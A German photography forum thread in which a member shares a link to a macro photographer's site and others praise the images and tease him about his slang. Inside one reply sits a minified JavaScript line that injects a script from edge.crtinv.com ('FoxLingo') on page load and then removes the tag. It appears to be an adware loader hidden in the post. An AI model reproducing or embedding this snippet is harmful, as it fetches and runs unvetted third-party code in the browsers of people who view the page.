Abbrechen
Suchergebnisse werden angezeigt für 
Stattdessen suchen nach 
Meintest du: 

Jetzt anmelden und Teil der Community werden!

Tolle Bilder!

profile.country.de_DE.title
Leezenblick
Neues Mitglied

Tolle Bilder!

Hallo,

ich weiss nicht, ob ich jetzt das richtige Unterforum gewählt habe, aber ich möchteeuch gerne einen Fotografen vorstellen, dessen Bilder mich total geflasht haben. Diese -vorwiegend Makro - Bilder sind mit hoher Präzision aufgenommen und mittels stacking sehr plastisch dargestellt.
Er ist zwar kein Sony-Fotograf, aber...einfach mal bei Interesse durchschauen: www.pen3.de

LG Timo

20 ANTWORTEN 20
profile.country.DE.title
huessi
Vielschreiber

... Timo nu mach aber hier keinen auf Mimöschen.

Ich konnte im Beug auf die tollen Aufnahmen mit dem "geflasht" nichts anfangen.

Keine Ahnung wie alt Du bist aber ich (55) stehe auf meine Muttersprache und versuche diese auch

vor den Einflüssen des Auslands zu verfechten.

Und insofern hatte ich ein sprachliches Problem weil ich den Zusammenhang suchte.

Gruß Jürgen

... aussem Pott, dat is da woste die Meinung mitten im Gesicht geklatscht krist.
Im Club seit Oktober 2010.
Susanne-Jupe
Mitglied

Hallo Timo,

danke für den Link. Dort sind wirklich sehr schöne Bilder zu sehen. Vor allem auch mal andere Sichtweisen kann man dort erkennen.

Olympus ist eine gute Marke, warum solltest du den Link deswegen nicht zeigen? :slight_smile:

LG susanne

PS: Bevor du dich über irgendetwas beschweren möchtest, beachte immer, ob der Beitrag, über den du dich mokierst, auch für dich gedacht ist. Hier kann man die einzelnen Usernamen und Beiträge anklicken und direkt darauf antworten. Ist nicht alles auf dich bezogen:))

profile.country.DE.title
HorstE.
Entdecker

Ist ja toll, dass es im Duden steht - seit 2006...

Ich habe auch nichts gegen englische oder denglische Worte, bin da nicht so zimperlich. Aber hier nun in der Jugendsprache zu schreiben, ist doch ein bischen verwegen. Oder soll ich mir alle Jahre einen neuen Duden kaufen, um die Beiträge der Jugendlichen (oder derjenigen, die zwar älter sind, aber auf betont jugendlich machen - Berufsjugendliche) zu verstehen?

Gruß Horst

Leezenblick
Neues Mitglied

Hallo, keine Sorge, ich habe das alles auch nur mit ´nem Augenzwinkern verstanden. Ich finde einige Reaktionen eher witzig. Schön, wenn anderen die Bilder auch gefallen.

LG Timo, the flash

profile.country.DE.title
Sir_Henry
Vielschreiber

Hallo Timo,

interessanter Link, - schöne Bilder. Der Rest ist redundantes Hintergrundflimmern, kann man rausfiltern, ohne das semantisch Inhalt verloren geht. Lass dich wegen sowas nicht vertreiben.

LG

Henry

Fotoannett
Mitglied

Hallo Timo,

auch ich bin dankbar für diesen Link.

Sonst hätte ich die Bilder nie sehen können.

Ich werde morgen nach Hamburg fahren und die Motive suchen.

Mal sehen, ob ich auch gefluscht werde.

Gruß

Annett

profile.country.DE.title
Lucky.Luke
Mitglied

Herzlichen Dank für den Link, Timo.

Da sind für mich ganz klasse Bilder dabei. Absolut sehenswert.

LG, Lucky

profile.country.DE.title
MatthiasD5D
Mitglied

Hallo,

wirklich sehr schöne Bilder. Die Falter liegen ganz auf meiner Linie.

Gruß, Matthias.

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

profile.country.DE.title
-Helga-
Vielschreiber

Hallo Timo

Auch ich finde solche Bilder einerseits faszinierend.
Es sind wirklich sehr gute Aufnahmen dabei.

Aber wenn ich das Gefühl bekomme es wird Eisspray eingesetzt dann ?????????????? 😞

LG Helga

profile.country.DE.title
Cremantus
Enthusiast

Klasse! Danke für den Link!!!